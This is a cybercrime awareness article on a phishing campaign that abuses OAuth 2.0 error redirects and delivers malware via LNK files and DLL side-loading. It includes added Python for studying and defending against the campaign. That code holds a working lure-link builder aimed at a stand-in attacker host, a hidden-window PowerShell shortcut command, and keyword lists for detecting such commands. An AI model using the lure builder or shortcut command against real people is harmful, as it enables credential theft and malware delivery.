Cybersecurity experts have warned that a new phishing and malware distribution campaign is abusing the redirect step of the OAuth 2.0 authorization flow used by online identity providers. According to the report, the attackers craft links that look like legitimate sign-in requests to a trusted identity provider but end by redirecting the user to attacker-controlled websites. The technique is mainly being used against government institutions and public-sector organizations.
How Attackers Abuse OAuth for Phishing
Microsoft security researchers stated that cybercriminals are sending phishing links disguised as social security notifications, e-signature requests, meeting invitations, and password reset alerts. In several cases, these links are also hidden inside PDF files to evade standard security scanning systems.
Experts explained that the attackers rely on the legitimate behaviour of the OAuth 2.0 protocol rather than on a flaw in it. They register their own OAuth application in a tenant they control and set its redirect URI to infrastructure they own. The lure link points at the genuine identity provider's authorization endpoint, so the victim sees a trusted domain, but it is built with parameters that guarantee the request fails. The identity provider then does exactly what the specification requires for a failed request: it sends the victim's browser to the application's registered redirect URI, which is the attacker's server, with the error details appended.
Bypassing MFA with Man-in-the-Middle Redirects
The report also revealed that in some campaigns the redirect landed victims on adversary-in-the-middle phishing frameworks. These proxy the real sign-in page, relay the victim's password and MFA response to the genuine service, and capture the resulting session cookie, so the attacker ends up with a valid authenticated session and the organization's multi-factor authentication (MFA) is bypassed without being broken.
Cybersecurity researchers also found that the attackers misuse the OAuth 'state' parameter. The identity provider echoes 'state' back unchanged in the redirect, so by placing the victim's email address in it the attacker can pre-fill the username box on the phishing page. This creates the illusion that the user is logging into an official portal that already knows them, while in reality they are interacting with a fake page.
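The mechanism described above, as an added example that is not part of the report and not Microsoft's code: a minimal authorization endpoint that behaves as RFC 6749 section 4.1.2.1 requires (a failed request is answered with a redirect to the registered redirect URI, carrying an error code and the unmodified `state`), the lure link an attacker would build against it, and the pre-fill step on the landing page. The identity provider host, the attacker's host and client_id, and the scope list are illustrative assumptions.

```python
"""Model of the OAuth 2.0 error-redirect behaviour abused in the campaign.

Added example, not Microsoft's code. The authorization-server logic
follows RFC 6749 section 4.1.2.1: when an authorization request fails
for a reason other than a bad client_id/redirect_uri, the server sends
the user-agent to the *registered* redirect_uri with an error code and
the client's `state` echoed back unchanged. All hostnames, the
client_id and the scope list are illustrative assumptions.
"""
from urllib.parse import urlencode, urlsplit, parse_qs

# Assumed: a legitimate identity provider and an app the attacker registered there.
IDP_AUTHORIZE = "https://login.example-idp.com/common/oauth2/v2.0/authorize"
ATTACKER_REDIRECT = "https://docs-review.example.net/callback"  # attacker-owned
ATTACKER_CLIENT_ID = "11111111-2222-3333-4444-555555555555"
REGISTERED_APPS = {ATTACKER_CLIENT_ID: ATTACKER_REDIRECT}
VALID_SCOPES = {"openid", "profile", "email", "offline_access"}


def build_lure(client_id: str, victim_email: str) -> str:
    """The link mailed to the victim: legitimate IdP host, but an invalid
    scope and prompt=none so the IdP never shows a page of its own and
    immediately bounces to the attacker's redirect_uri, carrying the
    victim's address inside `state`."""
    params = {
        "client_id": client_id,
        "response_type": "code",
        "redirect_uri": ATTACKER_REDIRECT,
        "scope": "openid nonexistent.scope",  # invalid on purpose
        "prompt": "none",  # forbid interaction: any failure becomes a redirect
        "state": victim_email,
    }
    return IDP_AUTHORIZE + "?" + urlencode(params)


def authorization_server(request_url: str) -> tuple:
    """Minimal RFC 6749 authorization endpoint. Returns (status, Location)."""
    q = {k: v[0] for k, v in parse_qs(urlsplit(request_url).query).items()}
    registered = REGISTERED_APPS.get(q.get("client_id"))
    # Unknown client or mismatched redirect_uri must NOT redirect (4.1.2.1):
    # the server renders an error page instead of trusting the URI.
    if registered is None or q.get("redirect_uri") != registered:
        return 400, ""
    err = {}
    scopes = set(q.get("scope", "").split())
    if not scopes <= VALID_SCOPES:
        err = {"error": "invalid_scope"}
    elif q.get("prompt") == "none":
        # No session and no interaction allowed (OpenID Connect error code).
        err = {"error": "login_required"}
    if not err:
        return 302, registered + "?" + urlencode({"code": "AUTHCODE", "state": q.get("state", "")})
    if "state" in q:
        err["state"] = q["state"]  # echoed verbatim, as the spec requires
    return 302, registered + "?" + urlencode(err)


def phishing_page_prefill(location: str) -> str:
    """What the attacker's landing page does: read the echoed state and
    pre-fill the username box so the page looks like a real sign-in."""
    return parse_qs(urlsplit(location).query).get("state", [""])[0]


def run_flow(victim_email: str) -> dict:
    """End-to-end: lure -> IdP error redirect -> attacker page with pre-fill."""
    lure = build_lure(ATTACKER_CLIENT_ID, victim_email)
    status, location = authorization_server(lure)
    return {
        "lure_host": urlsplit(lure).hostname,          # what the victim sees in the mail
        "status": status,
        "landing_host": urlsplit(location).hostname,   # where the browser actually ends up
        "error": parse_qs(urlsplit(location).query).get("error", [""])[0],
        "prefilled_email": phishing_page_prefill(location),
    }


if __name__ == "__main__":
    print(run_flow("alice@agency.gov.example"))
```

The point to take from the model: the only check that stops a redirect is the client_id/redirect_uri match, and that check passes because the attacker registered the URI themselves. Everything after it, including the verbatim echo of `state`, is correct protocol behaviour.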
Malware Delivery via ZIP Files and DLL Side-Loading
Another variant redirects the user to a download path that serves malware as a ZIP archive. The archive contains Windows shortcut (.LNK) files and HTML smuggling components. When the victim opens the LNK file, it launches a PowerShell script that begins collecting basic system information.
In a later stage the attackers use DLL side-loading. A legitimate, often signed, application is started with a malicious DLL placed where the application's DLL search order will find it first; the application loads that DLL, which decrypts the malware and loads it directly into memory, while the legitimate process keeps running in the background so that nothing looks out of place.
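For the delivery stage, here is an added triage script that is not from the report: it opens a ZIP archive, parses any Windows shortcut inside it according to the public MS-SHLLINK layout (fixed header, optional ID list and link info, then length-prefixed string fields), and flags shortcuts whose target or arguments invoke PowerShell or start minimized. The archive and shortcut are constructed in memory so the script runs offline; the command line in the sample is an illustration of the "collect basic system information" step, not the campaign's actual payload.

```python
"""Triage of a ZIP lure carrying a Windows shortcut (.LNK) that launches PowerShell.

Added example, not from the report. The shortcut and archive are built in
memory (constructed sample) so this runs offline. The parser follows the
MS-SHLLINK layout: 0x4C-byte header, optional LinkTargetIDList and
LinkInfo, then StringData fields in fixed order. Extra data blocks that
real samples may append after StringData are deliberately ignored here.
"""
import io
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7  # 7 starts the window minimized: a common way to hide a console
SUSPICIOUS_TOKENS = ("powershell", "pwsh", "-enc", "-w hidden", "-windowstyle hidden",
                     "bypass", "iex", "invoke-expression", "downloadstring")


def make_lnk(relative_path: str, arguments: str, show_cmd: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Build a minimal shortcut (constructed sample): header + RelativePath + Arguments."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex,
    # ShowCommand, HotKey, Reserved1, Reserved2, Reserved3  (76 bytes in total)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)

    def string_data(text: str) -> bytes:  # CountCharacters (u16) + UTF-16LE chars, no terminator
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


def parse_lnk(data: bytes) -> dict:
    """Extract ShowCommand and the StringData fields from a shell link."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_cmd = struct.unpack_from("<I", data, 0x3C)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_IDLIST:          # IDListSize (u16) + that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                   # LinkInfoSize (u32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]

    def read_string() -> str:
        nonlocal pos
        n = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            raw, pos = data[pos:pos + 2 * n], pos + 2 * n
            return raw.decode("utf-16-le", "replace")
        raw, pos = data[pos:pos + n], pos + n
        return raw.decode("cp1252", "replace")

    fields = {"show_cmd": show_cmd}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            fields[name] = read_string()
    return fields


def triage_zip(zip_bytes: bytes) -> list:
    """One record per .lnk member: reconstructed command line and indicators."""
    report = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                lnk = parse_lnk(zf.read(info))
            except ValueError as exc:
                report.append({"member": info.filename, "error": str(exc)})
                continue
            cmdline = f"{lnk.get('relative_path', '')} {lnk.get('arguments', '')}".strip().lower()
            hits = [t for t in SUSPICIOUS_TOKENS if t in cmdline]
            report.append({"member": info.filename, "command": cmdline, "indicators": hits,
                           "hidden_window": lnk["show_cmd"] == SW_SHOWMINNOACTIVE,
                           "suspicious": bool(hits)})
    return report


def build_sample_zip() -> bytes:
    """Constructed lure: a double-extension shortcut to PowerShell next to a harmless one."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Meeting_Invite.pdf.lnk", make_lnk(
            r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            '-w hidden -ep bypass -c "Get-ComputerInfo | Out-File $env:TEMP\\i.txt"'))
        zf.writestr("Agenda.lnk", make_lnk(r"..\Agenda.pdf", "", show_cmd=SW_SHOWNORMAL))
        zf.writestr("readme.txt", "decoy")
    return buf.getvalue()


if __name__ == "__main__":
    for rec in triage_zip(build_sample_zip()):
        print(rec)
```

The reconstructed command line is what an analyst actually wants from a shortcut, since the file name and icon are chosen to deceive; a real triage pipeline would also walk the extra data blocks (environment variables, the Darwin/MSI block) that some samples use to hide the true target.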
Microsoft Recommendations and Expert Warnings
According to the research report, the attackers trigger the error-based redirect by sending deliberately invalid OAuth parameters: for example an unrecognized scope value, which makes the identity provider return invalid_scope, or prompt=none, which forbids any user interaction so that a request from a user without an existing session fails immediately. In both cases the error is delivered to the registered redirect URI rather than shown on the identity provider's own page. The technique is increasingly being observed in real-world phishing campaigns.
Microsoft advises organizations to restrict which OAuth applications users may consent to and what permissions those applications hold, to enforce strong identity protection policies, to use Conditional Access, and to deploy cross-domain detection and response tooling that correlates identity, email and endpoint signals. One caveat for practitioners: in this campaign the redirect happens before any consent prompt and the application lives in the attacker's own tenant, so consent restrictions do not stop the lure itself; their value is in limiting what a stolen session can do and in surfacing the follow-on access.
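As an added example of the monitoring the report recommends (not a Microsoft detection rule), the following script scores authorization-endpoint URLs taken from proxy or mail-link logs for the indicators described above: a redirect_uri pointing at a host the organization never registered, prompt=none, a scope value that can only produce invalid_scope, and a state value that is an email address. The log format, the trusted hosts, the scope list and the sample lines are all constructed assumptions.

```python
"""Heuristic detection of OAuth error-redirect lures in proxy or mail-link logs.

Added example, not a Microsoft detection rule. The log format, the trusted
redirect hosts and the known scopes are assumptions; the log lines are
constructed samples.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Assumed: redirect_uri hosts of the apps this organisation itself registered.
TRUSTED_REDIRECT_HOSTS = {"portal.agency.example", "sso.agency.example"}
# Assumed: scopes the organisation's own apps legitimately request.
KNOWN_SCOPES = {"openid", "profile", "email", "offline_access", "user.read"}
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
URL_RE = re.compile(r"url=(\S+)")
USER_RE = re.compile(r"user=(\S+)")
RANK = {"high": 0, "medium": 1, "low": 2, "none": 3}


def analyse_authz_url(url: str):
    """Indicators found in one authorization-endpoint URL; None if the URL
    is not an authorization request at all (token, logout, ...)."""
    parts = urlsplit(url)
    if "authorize" not in parts.path.lower():
        return None
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    findings = []
    rhost = urlsplit(q.get("redirect_uri", "")).hostname
    if rhost and rhost not in TRUSTED_REDIRECT_HOSTS:
        findings.append(f"untrusted redirect_uri host {rhost}")
    if q.get("prompt") == "none":
        findings.append("prompt=none forces a silent error redirect when no session exists")
    unknown = set(q.get("scope", "").split()) - KNOWN_SCOPES
    if unknown:
        findings.append(f"unknown scope(s) {sorted(unknown)} would yield invalid_scope")
    if EMAIL_RE.match(q.get("state", "")):
        findings.append("state carries an e-mail address (pre-fill lure)")
    return findings


def severity(findings: list) -> str:
    """Untrusted redirect target combined with an error-forcing parameter is
    the campaign's signature; an untrusted target alone still merits a look."""
    untrusted = any(f.startswith("untrusted redirect_uri") for f in findings)
    forcing = any("prompt=none" in f or "invalid_scope" in f for f in findings)
    if untrusted and forcing:
        return "high"
    if untrusted or len(findings) >= 2:
        return "medium"
    return "low" if findings else "none"


# Constructed sample log: one benign request, one full lure, one token call, one odd redirect.
SAMPLE_LOG = """\
2025-01-15T09:01:02Z user=alice url=https://login.example-idp.com/common/oauth2/v2.0/authorize?client_id=aaaa-1111&response_type=code&redirect_uri=https%3A%2F%2Fportal.agency.example%2Fcb&scope=openid+profile&state=c3b9f2e1
2025-01-15T09:04:37Z user=alice url=https://login.example-idp.com/common/oauth2/v2.0/authorize?client_id=bbbb-2222&response_type=code&redirect_uri=https%3A%2F%2Fdocs-review.example.net%2Fcallback&scope=openid+nonexistent.scope&prompt=none&state=alice%40agency.gov.example
2025-01-15T09:05:10Z user=bob url=https://login.example-idp.com/common/oauth2/v2.0/token?grant_type=refresh_token
2025-01-15T09:06:44Z user=bob url=https://login.example-idp.com/common/oauth2/v2.0/authorize?client_id=cccc-3333&response_type=code&redirect_uri=https%3A%2F%2Fcdn.files-share.example.org%2Fauth&scope=openid&state=9f8e7d6c
"""


def triage(log_text: str) -> list:
    """One record per authorization URL in the log, highest severity first."""
    records = []
    for line in log_text.splitlines():
        m = URL_RE.search(line)
        if not m:
            continue
        findings = analyse_authz_url(m.group(1))
        if findings is None:
            continue
        u = USER_RE.search(line)
        records.append({"user": u.group(1) if u else "?",
                        "severity": severity(findings), "findings": findings})
    return sorted(records, key=lambda r: RANK[r["severity"]])


if __name__ == "__main__":
    for rec in triage(SAMPLE_LOG):
        print(rec["severity"].upper(), rec["user"], *rec["findings"], sep="\n  ")
```

The scope check is the noisiest of the four in a real environment, since legitimate apps request many Graph scopes; tune KNOWN_SCOPES from your own consent logs before relying on it, and treat the redirect_uri allowlist as the primary signal.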
Security experts place such attacks in the identity-based threat category: nothing in the protocol is exploited, and the attacker instead relies on its intended behaviour, deliberately generating error flows so that the trusted identity provider itself delivers the victim to the phishing site.
The report warns that cybercriminals continuously adopt new techniques, so both organizations and individual users must remain vigilant. Users are advised to avoid suspicious links, unexpected downloads, and authentication requests they did not initiate, even when the link begins with a familiar sign-in domain.
About the author – Ayesha Aayat is a law student and contributor covering cybercrime, online frauds, and digital safety concerns. Her writing aims to raise awareness about evolving cyber threats and legal responses.
